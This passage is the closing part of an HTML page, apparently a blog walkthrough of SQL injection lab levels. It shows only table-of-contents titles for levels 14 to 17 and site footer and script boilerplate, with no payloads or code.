href="#%E7%AC%AC%E5%8D%81%E5%9B%9B%E5%85%B3%EF%BC%9A%E5%8F%8C%E5%BC%95%E5%8F%B7-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.14.</span> <span class="toc-text">第十四关：双引号+报错注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%BA%94%E5%85%B3%EF%BC%9A%E5%8D%95%E5%BC%95%E5%8F%B7-%E5%B8%83%E5%B0%94%E5%9E%8B%E7%9B%B2%E6%B3%A8"><span class="toc-number">1.1.0.15.</span> <span class="toc-text">第十五关：单引号+布尔型盲注</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E5%85%AD%E5%85%B3%EF%BC%9A%E5%8F%8C%E5%BC%95%E5%8F%B7-%E5%B8%83%E5%B0%94%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.16.</span> <span class="toc-text">第十六关：双引号+布尔型注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%B8%83%E5%85%B3%EF%BC%9A%E5%8D%95%E5%BC%95%E5%8F%B7-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.17.</span> <span class="toc-text">第十七关：单引号+报错注入</span></a></li></ol></li></ol></li></ol></li></ol>
        </nav>
    </div>
</aside>





        </section>
        <footer class="hidden lg:block fixed bottom-0 left-0 sm:w-1/12 lg:w-1/6 bg-gray-100 z-40">
    
    <div class="footer-social-links">
        
            <a target="_blank" rel="noopener" href="https://github.com/h00ls">
                <i class="iconfont icon-github"></i>
            </a>
        
            <a href="/atom.xml">
                <i class="iconfont icon-rss"></i>
            </a>
        
    </div>
    
    
</footer>

        <div id="mask" class="hidden mask fixed inset-0 bg-gray-900 opacity-75 z-40"></div>
        <div id="search-view-container" class="hidden shadow-xl"></div>
        
<script src="/js/dom-event.min.js"></script>

<script src="//cdn.jsdelivr.net/npm/yox@1.0.0-alpha.121/dist/standard/prod/yox.min.js"></script>


<script src="/js/search.min.js"></script>



    <script src="//cdn.jsdelivr.net/npm/lightgallery.js@1.1.3/dist/js/lightgallery.min.js"></script>
    
<script src="/js/light-gallery.min.js"></script>





    </body>
</html>
